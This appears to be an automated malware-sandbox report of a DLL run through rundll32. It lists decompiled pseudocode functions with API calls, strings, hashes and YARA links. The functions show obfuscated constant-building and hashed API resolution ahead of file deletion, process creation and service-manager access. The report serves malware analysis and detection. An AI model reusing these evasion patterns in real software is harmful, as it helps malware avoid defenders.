					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E6F3401A4(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E6F3400E7();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6F33F56E, 6F33F575, 6F33F5AB

Memory Dump Source

Source File: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: d2c628556b21ff3c6c2927fff03124f415c8eaf68f10b10a210029ef3765f081
Instruction ID: c2e06340905153cd34ede8a5c841b5407c3ed651d949bfe27fb5d721f543495a
Opcode Fuzzy Hash: d2c628556b21ff3c6c2927fff03124f415c8eaf68f10b10a210029ef3765f081
Instruction Fuzzy Hash: A64182B2E047B4AFEB19DFA9C880D9EBBFCEF95314F50016AE404A7290D7719A41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 6F342221, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E6F342221(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8, char _a12, void* _a16) {
				char _v5;
				char _v12;
				char _v16;
				char* _v20;
				char _v24;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t39;
				char _t48;
				char _t51;
				char _t58;
				signed int _t64;
				void* _t76;
				void* _t81;
				signed int _t86;

				_t79 = __edx;
				_push(_a16);
				_push(_a12);
				E6F34233C(__ebx, __ecx, __edx, __eflags);
				_t39 = E6F341FC6(__eflags, _a4);
				_v16 = _t39;
				_t69 =  *(_a12 + 0x48);
				if(_t39 ==  *((intOrPtr*)( *(_a12 + 0x48) + 4))) {
					return 0;
				}
				_push(__ebx);
				_t81 = E6F33FEB1(_t69, 0x220);
				_t64 = __ebx | 0xffffffff;
				__eflags = _t81;
				if(__eflags == 0) {
					L5:
					_t86 = _t64;
					goto L6;
				} else {
					_t81 = memcpy(_t81,  *(_a12 + 0x48), 0x88 << 2);
					 *_t81 =  *_t81 & 0x00000000;
					_t86 = E6F34242D(_t64, _t79, _t81,  *(_a12 + 0x48), __eflags, _v16, _t81);
					__eflags = _t86 - _t64;
					if(__eflags != 0) {
						__eflags = _a8;
						if(_a8 == 0) {
							E6F341371();
						}
						asm("lock xadd [eax], ebx");
						__eflags = _t64 == 1;
						if(_t64 == 1) {
							_t58 = _a12;
							__eflags =  *((intOrPtr*)(_t58 + 0x48)) - 0x6f366268;
							if( *((intOrPtr*)(_t58 + 0x48)) != 0x6f366268) {
								E6F33FEFF( *((intOrPtr*)(_t58 + 0x48)));
							}
						}
						 *_t81 = 1;
						_t76 = _t81;
						_t81 = 0;
						 *(_a12 + 0x48) = _t76;
						_t48 = _a12;
						__eflags =  *(_t48 + 0x350) & 0x00000002;
						if(( *(_t48 + 0x350) & 0x00000002) == 0) {
							__eflags =  *0x6f366788 & 0x00000001;
							if(__eflags == 0) {
								_v24 =  &_a12;
								_v20 =  &_a16;
								_t51 = 5;
								_v16 = _t51;
								_v12 = _t51;
								_push( &_v16);
								_push( &_v24);
								_push( &_v12);
								E6F341EC2( &_v5, _t79, __eflags);
								__eflags = _a8;
								if(_a8 != 0) {
									 *0x6f36625c =  *_a16;
								}
							}
						}
						L6:
						E6F33FEFF(_t81);
						return _t86;
					} else {
						 *((intOrPtr*)(E6F3401A4(__eflags))) = 0x16;
						goto L5;
					}
				}
			}

APIs

Part of subcall function 6F341FC6: GetOEMCP.KERNEL32(00000000,6F34223C,6F343187,00000000,00000000,00000000,00000000,?,6F343187), ref: 6F341FF1

_free.LIBCMT ref: 6F342299
_free.LIBCMT ref: 6F3422CF

Strings

hb6o, xrefs: 6F3422C3

Memory Dump Source

Source File: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID: hb6o
API String ID: 269201875-3230986754
Opcode ID: d199b88a3880c3a504afb0426abe465f9a5c40c50a6c6fa3819fc6dfd0085dca
Instruction ID: 505596b1444f28d9af85a5429b75208a6e39a29cbd02827092ed06cf30faf5d2
Opcode Fuzzy Hash: d199b88a3880c3a504afb0426abe465f9a5c40c50a6c6fa3819fc6dfd0085dca
Instruction Fuzzy Hash: 06319E72904249AFDB01DF69C940BDA7BF4EF85324F15416AE814EB291EB32ED50CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6F33CD1E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6F33CD1E(void* __edx, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				signed int _t20;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				signed int _t26;
				signed int _t30;
				intOrPtr _t31;
				signed int _t34;
				void* _t48;
				signed int _t54;

				if( *0x6f37e131 == 0) {
					_t54 = _a4;
					__eflags = _t54;
					if(_t54 == 0) {
						L4:
						_t19 = E6F33D216();
						__eflags = _t19;
						if(_t19 == 0) {
							L9:
							_t20 =  *0x6f36609c; // 0xe6b94de
							_push(_t48);
							_push(0x20);
							asm("ror eax, cl");
							_t23 = (_t20 & 0x0000001f | 0xffffffff) ^  *0x6f36609c;
							__eflags = _t23;
							_v16 = _t23;
							_v12 = _t23;
							_v8 = _t23;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_v16 = _t23;
							_v12 = _t23;
							_v8 = _t23;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							goto L10;
						} else {
							__eflags = _t54;
							if(_t54 != 0) {
								goto L9;
							} else {
								_t25 = E6F33FB81(_t19, 0x6f37e134);
								__eflags = _t25;
								if(_t25 != 0) {
									L8:
									_t24 = 0;
								} else {
									_t26 = E6F33FB81(_t25, 0x6f37e140);
									__eflags = _t26;
									if(_t26 == 0) {
										L10:
										 *0x6f37e131 = 1;
										_t24 = 1;
									} else {
										goto L8;
									}
								}
							}
						}
						return _t24;
					} else {
						__eflags = _t54 - 1;
						if(_t54 != 1) {
							E6F33CEA2(__edx, _t48, _t54, 5);
							asm("int3");
							E6F33D020(__edx, 0x6f364f98, 8);
							_v8 = _v8 & 0x00000000;
							__eflags =  *0x6f320000 - 0x5a4d; // 0x5a4d
							if(__eflags != 0) {
								L19:
								_v8 = 0xfffffffe;
								_t30 = 0;
								__eflags = 0;
							} else {
								_t31 =  *0x6f32003c; // 0x80
								__eflags =  *((intOrPtr*)(_t31 + 0x6f320000)) - 0x4550;
								if( *((intOrPtr*)(_t31 + 0x6f320000)) != 0x4550) {
									goto L19;
								} else {
									__eflags =  *((intOrPtr*)(_t31 + 0x6f320018)) - 0x10b;
									if( *((intOrPtr*)(_t31 + 0x6f320018)) != 0x10b) {
										goto L19;
									} else {
										_t34 = E6F33CBA6(0x6f320000, _a4 - 0x6f320000);
										__eflags = _t34;
										if(_t34 == 0) {
											goto L19;
										} else {
											__eflags =  *(_t34 + 0x24);
											if( *(_t34 + 0x24) < 0) {
												goto L19;
											} else {
												_v8 = 0xfffffffe;
												_t30 = 1;
											}
										}
									}
								}
							}
							 *[fs:0x0] = _v20;
							return _t30;
						} else {
							goto L4;
						}
					}
				} else {
					return 1;
				}
			}

Strings

@7o, xrefs: 6F33CD9A
47o, xrefs: 6F33CD79

Memory Dump Source

Source File: 00000004.00000002.362124999.000000006F322000.00000020.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000004.00000002.362115408.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362120157.000000006F321000.00000080.00020000.sdmp Download File
Associated: 00000004.00000002.362149333.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.362170772.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362178221.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.362196350.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.362201673.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 47o$@7o
API String ID: 0-1575379197
Opcode ID: 2889655ee6265e795fc1257062be945ce8a6cbaf3139ce0e0cd7af22acd81cf7
Instruction ID: 73f126f9cdba30c98fa27cca780c0d13e9213c20b07dd1593c1e7ae8233b1762
Opcode Fuzzy Hash: 2889655ee6265e795fc1257062be945ce8a6cbaf3139ce0e0cd7af22acd81cf7
Instruction Fuzzy Hash: C0117077E017B56ACF15DE78C8416CE7BE99F06368F01416AEC50EB280D672A54187A1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 4692 Parent PID: 5116 rundll32.exeCOMMON

Executed Functions

Function 1001F790, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E1001F790(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t39;
				int _t48;
				signed int _t50;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E10022523(_t39);
				_v20 = 0x305f8e;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0x5f829bc1;
				_v12 = 0x22b27e;
				_v12 = _v12 >> 6;
				_v12 = _v12 + 0x22ee;
				_v12 = _v12 ^ 0x000c4601;
				_v8 = 0xcd41e2;
				_v8 = _v8 + 0xd868;
				_v8 = _v8 + 0xd31f;
				_t50 = 0x5f;
				_v8 = _v8 / _t50;
				_v8 = _v8 ^ 0x000a754c;
				_v16 = 0x592d24;
				_v16 = _v16 | 0x8ee4cdff;
				_v16 = _v16 ^ 0x8efaae11;
				E10002309(_t50 + 0x2c, _t50, _t50, 0x7c50bf37, _t50, 0x9c9047d0);
				_t48 = DeleteFileW(_a8); // executed
				return _t48;
			}

0x1001f796
0x1001f799
0x1001f79c
0x1001f7a1
0x1001f7a6
0x1001f7b0
0x1001f7b6
0x1001f7bd
0x1001f7c4
0x1001f7c8
0x1001f7cf
0x1001f7d6
0x1001f7dd
0x1001f7e4
0x1001f7f0
0x1001f7f8
0x1001f7fb
0x1001f802
0x1001f809
0x1001f810
0x1001f82e
0x1001f839
0x1001f83e

APIs

DeleteFileW.KERNEL32(8EFAAE11), ref: 1001F839

Strings

$-Y, xrefs: 1001F802
Lu, xrefs: 1001F7EB
Lu, xrefs: 1001F81A
", xrefs: 1001F7C8

Memory Dump Source

Source File: 00000005.00000002.365391011.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.365378189.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.365465077.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: DeleteFile
String ID: $-Y$Lu$Lu$"
API String ID: 4033686569-1114282491
Opcode ID: 79e79a46e8f2bc5455ac9c56fc484e8236daa8409ea2d6f81888c9965c792b55
Instruction ID: 543db5e143fc82e0febe4e5b84228ca4fb2f9e33671b133290cd188315d44989
Opcode Fuzzy Hash: 79e79a46e8f2bc5455ac9c56fc484e8236daa8409ea2d6f81888c9965c792b55
Instruction Fuzzy Hash: 7911F5B6C00208FBDF09DFE4CC4A9AEBBB5FB54318F108588E915AA251D3B59B649F50

Uniqueness

Uniqueness Score: -1.00%

Function 1001B0E5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E1001B0E5(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t54;

				E10022523(_t43);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x970fc6;
				_v28 = 0xf733cf;
				_v12 = 0x7d503f;
				_v12 = _v12 | 0x482efb7d;
				_v12 = _v12 + 0xffffad5b;
				_v12 = _v12 ^ 0x48710332;
				_v20 = 0x599c2f;
				_t54 = 0x26;
				_v20 = _v20 / _t54;
				_v20 = _v20 ^ 0x00074c3c;
				_v8 = 0x25764d;
				_v8 = _v8 + 0xffffd21e;
				_v8 = _v8 + 0x28dd;
				_v8 = _v8 ^ 0x00291a50;
				_v16 = 0x4f32db;
				_v16 = _v16 | 0x18cb750c;
				_v16 = _v16 ^ 0x18cb774b;
				_t51 = E10002309(0x234, _t54, _t54, 0x491df8aa, _t54, 0x9c9047d0);
				_t52 =  *_t51(_a16, 0, _a24, 0x28, __ecx, __edx, 0x28, _a8, 0, _a16, _a20, _a24); // executed
				return _t52;
			}

0x1001b0fd
0x1001b102
0x1001b109
0x1001b112
0x1001b119
0x1001b120
0x1001b127
0x1001b12e
0x1001b135
0x1001b141
0x1001b149
0x1001b14c
0x1001b153
0x1001b15a
0x1001b161
0x1001b168
0x1001b16f
0x1001b176
0x1001b17d
0x1001b19d
0x1001b1af
0x1001b1b4

APIs

SetFileInformationByHandle.KERNEL32(00000000,00000000,00970FC6,00000028), ref: 1001B1AF

Strings

Mv%, xrefs: 1001B153
?P}, xrefs: 1001B119

Memory Dump Source

Source File: 00000005.00000002.365391011.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.365378189.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.365465077.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: FileHandleInformation
String ID: ?P}$Mv%
API String ID: 3935143524-2885159553
Opcode ID: 1ff294a8cd7c50f0204e083802874af947afed1ebbf66a27c509e70a6e85c5c2
Instruction ID: c6294db63f7ee4bb071aec84c080713cd91fe9e816122fc1ccfe0a57a864389e
Opcode Fuzzy Hash: 1ff294a8cd7c50f0204e083802874af947afed1ebbf66a27c509e70a6e85c5c2
Instruction Fuzzy Hash: A02164B2D0120DFFDF54CF98CD4AAAEBBB1FB04305F008188E915A6290E3B55B248F90

Uniqueness

Uniqueness Score: -1.00%

Function 100142E4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
memoryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E100142E4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t43;
				char _t54;
				signed int _t57;
				void* _t62;
				void* _t63;

				_push(_a20);
				_t62 = __edx;
				_push(_a16);
				_t63 = __ecx;
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10022523(_t43);
				_v36 = 0xead706;
				_v32 = 0x8aaadf;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0x3b6f9b;
				_t57 = 0x3f;
				_v12 = _v12 * 0xe;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x1a7fe3f0;
				_v20 = 0x6318b1;
				_v20 = _v20 | 0x2b2fc1f2;
				_v20 = _v20 ^ 0x2b6f417a;
				_v8 = 0xeb56a2;
				_v8 = _v8 << 1;
				_v8 = _v8 / _t57;
				_v8 = _v8 * 0x2f;
				_v8 = _v8 ^ 0x015d5ff9;
				_v16 = 0x2619ef;
				_v16 = _v16 << 6;
				_v16 = _v16 ^ 0x098e35d6;
				E10002309(_t57 + 0x4d, _t57, _t57, 0x52f9059f, _t57, 0x9c9047d0);
				_t54 = RtlFreeHeap(_t62, 0, _t63); // executed
				return _t54;
			}

0x100142ed
0x100142f2
0x100142f4
0x100142f7
0x100142f9
0x100142fa
0x100142fd
0x10014300
0x10014301
0x10014302
0x10014307
0x10014311
0x1001431a
0x1001431d
0x10014320
0x1001432d
0x10014334
0x10014337
0x1001433b
0x10014342
0x10014349
0x10014350
0x10014357
0x1001435e
0x1001436b
0x10014377
0x1001437a
0x10014381
0x10014388
0x1001438c
0x1001439f
0x100143aa
0x100143b2

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,072B1AC5,00000000,00000000), ref: 100143AA

Strings

zAo+, xrefs: 10014350

Memory Dump Source

Source File: 00000005.00000002.365391011.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.365378189.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.365465077.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID: zAo+
API String ID: 3298025750-440923707
Opcode ID: 782d704bb29470d0423d04c6355d4fda0cb05a54fe280a973ff5c90c0f5ad215
Instruction ID: 613f1e34ca62f437a9a883da1f6942e021cbcbe0c1bd7b5908013fed4c35e44f
Opcode Fuzzy Hash: 782d704bb29470d0423d04c6355d4fda0cb05a54fe280a973ff5c90c0f5ad215
Instruction Fuzzy Hash: 4D2128B1D00218FF9B08CF99D98A8EEBFB9FB44344F508199E515A7240D3B05B149B90

Uniqueness

Uniqueness Score: -1.00%

Function 1001FE9D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E1001FE9D(void* __edx, intOrPtr _a4, intOrPtr _a8, int _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* __ecx;
				void* _t34;
				void* _t41;
				void* _t43;

				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(0);
				E10022523(_t34);
				_v32 = 0xfebeef;
				_v28 = 0x6b4d4f;
				_v24 = 0;
				_v20 = 0x72d4d3;
				_v20 = _v20 + 0x7ce2;
				_v20 = _v20 ^ 0x0072d8bc;
				_v16 = 0x618a6;
				_v16 = _v16 + 0x2ac;
				_v16 = _v16 ^ 0x00083b16;
				_v12 = 0x17740f;
				_v12 = _v12 + 0x9d82;
				_v12 = _v12 ^ 0x0012bdfc;
				_v8 = 0xba692b;
				_v8 = _v8 ^ 0x31422697;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x0005552e;
				_push(0x21ce39be);
				_push(0xb53dc03);
				_push(_t42);
				_push(_t42);
				_t43 = 0x15;
				E10002309(_t43);
				_t41 = OpenSCManagerW(0, 0, _a16); // executed
				return _t41;
			}

0x1001fea4
0x1001fea9
0x1001feaa
0x1001fead
0x1001feb1
0x1001feb2
0x1001feb7
0x1001fec1
0x1001fec8
0x1001fecb
0x1001fed2
0x1001fed9
0x1001fee0
0x1001fee7
0x1001feee
0x1001fef5
0x1001fefc
0x1001ff03
0x1001ff0a
0x1001ff11
0x1001ff18
0x1001ff1c
0x1001ff2f
0x1001ff35
0x1001ff3a
0x1001ff3b
0x1001ff3e
0x1001ff3f
0x1001ff4c
0x1001ff52

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,10015191,?,?,?,?,?,?,?,?,?,?,0EB411AB), ref: 1001FF4C

Strings

OMk, xrefs: 1001FEC1

Memory Dump Source

Source File: 00000005.00000002.365391011.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.365378189.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.365465077.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: ManagerOpen
String ID: OMk
API String ID: 1889721586-456170103
Opcode ID: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
Instruction ID: 1d80d5bf462f7d76a803e315767f53b854081a7213ef634c08bc69ad92fa0287
Opcode Fuzzy Hash: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
Instruction Fuzzy Hash: 6D1113B2C0022CBBEB11DFA5D94A8EFBFB4EF44318F108188E91466201D3B95B149B91

Uniqueness

Uniqueness Score: -1.00%

Function 100231D2, Relevance: 1.6, APIs: 1, Instructions: 77
processCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E100231D2(void* __ecx, WCHAR* __edx, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16, struct _STARTUPINFOW* _a28, intOrPtr _a32, intOrPtr _a36, struct _PROCESS_INFORMATION* _a48, int _a52, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t63;
				signed int _t65;
				WCHAR* _t71;

				_push(_a56);
				_t71 = __edx;
				_push(_a52);
				_push(_a48);
				_push(0);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(0);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E10022523(_t54);
				_v28 = 0x2cec17;
				_v24 = 0;
				_v16 = 0x5aadab;
				_v16 = _v16 << 3;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x000031a8;
				_v12 = 0x82119f;
				_v12 = _v12 >> 2;
				_v12 = _v12 + 0xffff09c3;
				_t65 = 0x25;
				_v12 = _v12 / _t65;
				_v12 = _v12 ^ 0x0004d7f2;
				_v8 = 0x7cd8a6;
				_v8 = _v8 >> 6;
				_v8 = _v8 | 0x702a8e48;
				_v8 = _v8 + 0xffff37f0;
				_v8 = _v8 ^ 0x702d019b;
				_v20 = 0x367fb2;
				_v20 = _v20 + 0xffff7ba2;
				_v20 = _v20 ^ 0x003ae9c9;
				E10002309(0x2e4, _t65, _t65, 0xbf8568a3, _t65, 0x9c9047d0);
				_t63 = CreateProcessW(_t71, _a16, 0, 0, _a52, 0, 0, 0, _a28, _a48); // executed
				return _t63;
			}

APIs

CreateProcessW.KERNEL32(000C0354,?,00000000,00000000,?,00000000,00000000,00000000,229292B4,?), ref: 100232BB

Memory Dump Source

Source File: 00000005.00000002.365391011.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.365378189.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.365465077.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction ID: db286c9e9bcad3bd2e87b522c53d89c9dfc5ed19f2ace101bae5327955dfaec9
Opcode Fuzzy Hash: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction Fuzzy Hash: 21311476801248BBCF65DF96CD49CDFBFB5FB89704F108188F914A6220D3B58A60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1001199D, Relevance: 1.6, APIs: 1, Instructions: 71
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E1001199D(void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a20, long _a24, long _a28, long _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t55;
				void* _t68;
				signed int _t69;
				signed int _t70;

				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				E10022523(_t55);
				_v12 = 0xd4f63c;
				_v12 = _v12 >> 7;
				_v12 = _v12 << 0xf;
				_v12 = _v12 + 0xffffff46;
				_v12 = _v12 ^ 0xd4fb5fe8;
				_v8 = 0x967d18;
				_v8 = _v8 + 0xffffef98;
				_t69 = 0x14;
				_v8 = _v8 / _t69;
				_t70 = 0x4a;
				_v8 = _v8 / _t70;
				_v8 = _v8 ^ 0x000a0722;
				_v20 = 0x4653bc;
				_v20 = _v20 * 0x70;
				_v20 = _v20 ^ 0x1ec2604c;
				_v16 = 0x7577a9;
				_v16 = _v16 * 0x3c;
				_v16 = _v16 ^ 0x1b87e59a;
				E10002309(0x10a, _t70, _t70, 0xb484d458, _t70, 0x9c9047d0);
				_t68 = CreateFileW(_a4, _a24, _a28, 0, _a32, _a20, 0); // executed
				return _t68;
			}

0x100119a6
0x100119a7
0x100119aa
0x100119ad
0x100119b0
0x100119b3
0x100119b6
0x100119b9
0x100119bc
0x100119bf
0x100119c3
0x100119c4
0x100119c9
0x100119d3
0x100119d9
0x100119dd
0x100119e4
0x100119eb
0x100119f2
0x100119fe
0x10011a03
0x10011a0b
0x10011a13
0x10011a16
0x10011a1d
0x10011a30
0x10011a38
0x10011a3f
0x10011a4a
0x10011a4d
0x10011a60
0x10011a79
0x10011a7f

APIs

CreateFileW.KERNEL32(D4FB5FE8,?,?,00000000,?,?,00000000), ref: 10011A79

Memory Dump Source

Source File: 00000005.00000002.365391011.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.365378189.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.365465077.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
Instruction ID: 4460bfc2ec69cb6a9c9d4ae8ab6b4977e7447a0d843199ae8caee7af6f2384ce
Opcode Fuzzy Hash: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
Instruction Fuzzy Hash: E021E27280021DFBDF05CF95D8498DEBFB6EF49354F108188F91466260D3B69A61AF90

Uniqueness

Uniqueness Score: -1.00%

Function 10002985, Relevance: 1.6, APIs: 1, Instructions: 58
memoryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E10002985(long __ecx, long __edx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t43;
				void* _t53;
				signed int _t55;
				long _t60;
				long _t61;

				_push(_a12);
				_t60 = __edx;
				_t61 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10022523(_t43);
				_v20 = 0x610f25;
				_v20 = _v20 ^ 0x98bdb346;
				_v20 = _v20 >> 3;
				_v20 = _v20 ^ 0x13199c72;
				_v16 = 0x24641b;
				_t55 = 0x72;
				_v16 = _v16 * 0x35;
				_v16 = _v16 ^ 0xfebd96de;
				_v16 = _v16 ^ 0xf931a9e3;
				_v12 = 0x6331a9;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 / _t55;
				_v12 = _v12 ^ 0x0006f398;
				_v8 = 0x8145a8;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 << 0xd;
				_v8 = _v8 + 0x8268;
				_v8 = _v8 ^ 0x0405b518;
				E10002309(_t55 + 0x5d, _t55, _t55, 0x9d19c04e, _t55, 0x9c9047d0);
				_t53 = RtlAllocateHeap(_a8, _t60, _t61); // executed
				return _t53;
			}

0x1000298d
0x10002990
0x10002992
0x10002994
0x10002997
0x1000299a
0x1000299b
0x1000299c
0x100029a1
0x100029ab
0x100029b4
0x100029b8
0x100029bf
0x100029cc
0x100029d3
0x100029d6
0x100029dd
0x100029e4
0x100029eb
0x100029f9
0x100029fc
0x10002a03
0x10002a0a
0x10002a0e
0x10002a12
0x10002a19
0x10002a31
0x10002a3e
0x10002a45

APIs

RtlAllocateHeap.NTDLL(F931A9E3,01AD2A76,65B9EDAF,?,?,?,?,?,?,?,?,00000000,229292B5), ref: 10002A3E

Memory Dump Source

Source File: 00000005.00000002.365391011.0000000010001000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.365378189.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.365465077.0000000010025000.00000004.00000001.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 138a33bbf657fc90b6a1f11ed01e494c992cf007267dd6aff1ee16601a01d635
Instruction ID: a28c389faf7b726d87918facb3c60479c9af1eed29e3a2ef13c7030710ba699e
Opcode Fuzzy Hash: 138a33bbf657fc90b6a1f11ed01e494c992cf007267dd6aff1ee16601a01d635
Instruction Fuzzy Hash: 84215372C00208BBDF18CFA8D84A8DEBFB5FB41710F108098E824A6210E3B4AB14DF90

Uniqueness

Uniqueness Score: -1.00%

Function 1001A1D9, Relevance: 1.6, APIs: 1, Instructions: 57
serviceCOMMON

Download Yara Rule

C-Code - Quality: 77%

